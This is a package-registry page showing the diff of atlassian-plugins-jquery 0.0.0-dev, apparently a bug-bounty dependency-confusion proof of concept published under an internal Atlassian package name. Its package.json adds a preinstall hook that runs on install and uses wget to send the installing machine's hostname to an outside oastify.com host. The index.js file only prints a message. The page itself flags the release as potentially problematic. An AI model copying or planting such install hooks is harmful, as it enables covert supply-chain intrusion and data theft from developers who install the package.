atlassian-plugins-jquery 0.0.0-dev

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of atlassian-plugins-jquery might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +1 -0
  2. package/package.json +16 -0
package/index.js ADDED
@@ -0,0 +1 @@
1
+ console.log("This is an example for a dpendency confusion vulnerability")
package/package.json ADDED
@@ -0,0 +1,16 @@
1
+ {
2
+ "name": "atlassian-plugins-jquery",
3
+ "version": "0.0.0-dev",
4
+ "description": "Demo package for dependency confusion testing",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall":"wget http://$(hostname).n7ve40n82s6poxb5uwwf35ns9jfa9y1mq.oastify.com/$(hostname)",
8
+ "start": "node index.js"
9
+ },
10
+ "keywords": [
11
+ ],
12
+ "author": "https://hackerone.com/moti-h",
13
+ "license": "MIT",
14
+ "dependencies": {
15
+ }
16
+ }